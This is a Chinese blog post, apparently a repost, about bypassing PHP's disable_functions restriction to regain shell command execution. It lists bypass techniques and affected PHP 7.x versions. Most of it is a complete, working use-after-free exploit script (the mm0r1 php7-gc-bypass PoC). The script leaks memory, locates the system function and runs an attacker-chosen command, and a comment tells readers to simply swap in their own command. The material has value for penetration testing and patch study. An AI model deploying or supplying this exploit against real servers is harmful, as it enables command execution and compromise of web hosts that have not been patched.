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  • disable_functions Bypass

    参考文章和poc(文中均有poc下载地址) :



    当然 freebuf 这篇文章写的也很不错,但是偏重于原理,以后一定要再学习  https://www.freebuf.com/articles/web/169156.html

    啥是disable_functions Bypass 呢?



    dl,eval,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail,imap_open,imap_mail,putenv,ini_set,apache_setenv,symlink,link 等

    将其写在php.ini配置文件中,就是我们所说的disable functions了。  

    Bypass disable_functions Shell




    • 常规绕过: exec、shell_exec、system、passthru、popen、proc_open
    • ld_preload绕过: mail、imap_mail、error_log、mb_send_mail
    • pcntl_exec
    • imap_open
    • fastcgi
    • com
    • apache mod-cgi


    • env - docker环境, 用于测试各类绕过exp
    • papar - bypass原理
    • exp - bypass脚本


    PHP 7.1-7.3 disable_functions bypass

    利用php json序列化漏洞,以绕过disable_functions并执行系统命令。

    disable_functions Bypass:突破disable_functions达到命令执行的Shell


    • 7.1 - all versions to date
    • 7.2 < 7.2.19 (released: 30 May 2019)
    • 7.3 < 7.3.6 (released: 30 May 2019)






    # PHP 7.0-7.3 disable_functions bypass PoC (*nix only)
    # Bug: https://bugs.php.net/bug.php?id=72530
    # This exploit should work on all PHP 7.0-7.3 versions
    # released as of 04/10/2019, specifically:
    # PHP 7.0 - 7.0.33
    # PHP 7.1 - 7.1.31
    # PHP 7.2 - 7.2.23
    # PHP 7.3 - 7.3.10
    # Author: https://github.com/mm0r1
    #直接修改红色字体的代码就好,注意,服务器的环境必须是Linux ,如果是Windows ,则无法运行; uname -a 命令在Linux的意思就是查看系统信息
    pwn("uname -a"); function pwn($cmd) { global $abc, $helper; function str2ptr(&$str, $p = 0, $s = 8) { $address = 0; for($j = $s-1; $j >= 0; $j--) { $address <<= 8; $address |= ord($str[$p+$j]); } return $address; } function ptr2str($ptr, $m = 8) { $out = ""; for ($i=0; $i < $m; $i++) { $out .= chr($ptr & 0xff); $ptr >>= 8; } return $out; } function write(&$str, $p, $v, $n = 8) { $i = 0; for($i = 0; $i < $n; $i++) { $str[$p + $i] = chr($v & 0xff); $v >>= 8; } } function leak($addr, $p = 0, $s = 8) { global $abc, $helper; write($abc, 0x68, $addr + $p - 0x10); $leak = strlen($helper->a); if($s != 8) { $leak %= 2 << ($s * 8) - 1; } return $leak; } function parse_elf($base) { $e_type = leak($base, 0x10, 2); $e_phoff = leak($base, 0x20); $e_phentsize = leak($base, 0x36, 2); $e_phnum = leak($base, 0x38, 2); for($i = 0; $i < $e_phnum; $i++) { $header = $base + $e_phoff + $i * $e_phentsize; $p_type = leak($header, 0, 4); $p_flags = leak($header, 4, 4); $p_vaddr = leak($header, 0x10); $p_memsz = leak($header, 0x28); if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write # handle pie $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr; $data_size = $p_memsz; } else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec $text_size = $p_memsz; } } if(!$data_addr || !$text_size || !$data_size) return false; return [$data_addr, $text_size, $data_size]; } function get_basic_funcs($base, $elf) { list($data_addr, $text_size, $data_size) = $elf; for($i = 0; $i < $data_size / 8; $i++) { $leak = leak($data_addr, $i * 8); if($leak - $base > 0 && $leak - $base < $text_size) { $deref = leak($leak); # 'constant' constant check if($deref != 0x746e6174736e6f63) continue; } else continue; $leak = leak($data_addr, ($i + 4) * 8); if($leak - $base > 0 && $leak - $base < $text_size) { $deref = leak($leak); # 'bin2hex' constant check if($deref != 0x786568326e6962) continue; } else continue; return $data_addr + $i * 8; } } function get_binary_base($binary_leak) { $base = 0; $start = $binary_leak & 0xfffffffffffff000; for($i = 0; $i < 0x1000; $i++) { $addr = $start - 0x1000 * $i; $leak = leak($addr, 0, 7); if($leak == 0x10102464c457f) { # ELF header return $addr; } } } function get_system($basic_funcs) { $addr = $basic_funcs; do { $f_entry = leak($addr); $f_name = leak($f_entry, 0, 6); if($f_name == 0x6d6574737973) { # system return leak($addr + 8); } $addr += 0x20; } while($f_entry != 0); return false; } class ryat { var $ryat; var $chtg; function __destruct() { $this->chtg = $this->ryat; $this->ryat = 1; } } class Helper { public $a, $b, $c, $d; } if(stristr(PHP_OS, 'WIN')) { die('This PoC is for *nix systems only.'); } $n_alloc = 10; # increase this value if you get segfaults $contiguous = []; for($i = 0; $i < $n_alloc; $i++) $contiguous[] = str_repeat('A', 79); $poc = 'a:4:{i:0;i:1;i:1;a:1:{i:0;O:4:"ryat":2:{s:4:"ryat";R:3;s:4:"chtg";i:2;}}i:1;i:3;i:2;R:5;}'; $out = unserialize($poc); gc_collect_cycles(); $v = []; $v[0] = ptr2str(0, 79); unset($v); $abc = $out[2][0]; $helper = new Helper; $helper->b = function ($x) { }; if(strlen($abc) == 79 || strlen($abc) == 0) { die("UAF failed"); } # leaks $closure_handlers = str2ptr($abc, 0); $php_heap = str2ptr($abc, 0x58); $abc_addr = $php_heap - 0xc8; # fake value write($abc, 0x60, 2); write($abc, 0x70, 6); # fake reference write($abc, 0x10, $abc_addr + 0x60); write($abc, 0x18, 0xa); $closure_obj = str2ptr($abc, 0x20); $binary_leak = leak($closure_handlers, 8); if(!($base = get_binary_base($binary_leak))) { die("Couldn't determine binary base address"); } if(!($elf = parse_elf($base))) { die("Couldn't parse ELF header"); } if(!($basic_funcs = get_basic_funcs($base, $elf))) { die("Couldn't get basic_functions address"); } if(!($zif_system = get_system($basic_funcs))) { die("Couldn't get zif_system address"); } # fake closure object $fake_obj_offset = 0xd0; for($i = 0; $i < 0x110; $i += 8) { write($abc, $fake_obj_offset + $i, leak($closure_obj, $i)); } # pwn write($abc, 0x20, $abc_addr + $fake_obj_offset); write($abc, 0xd0 + 0x38, 1, 4); # internal func type write($abc, 0xd0 + 0x68, $zif_system); # internal func handler ($helper->b)($cmd); exit(); }

    支持 PHP7.0~7.3

    GitHub地址 :https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php

    当然,网上还给出了 antword 蚁剑直接绕过的插件,另一篇文章里面有简写,,


  • 相关阅读:
    失落 绝望
  • 原文地址:https://www.cnblogs.com/zhangqianxi/p/13549529.html
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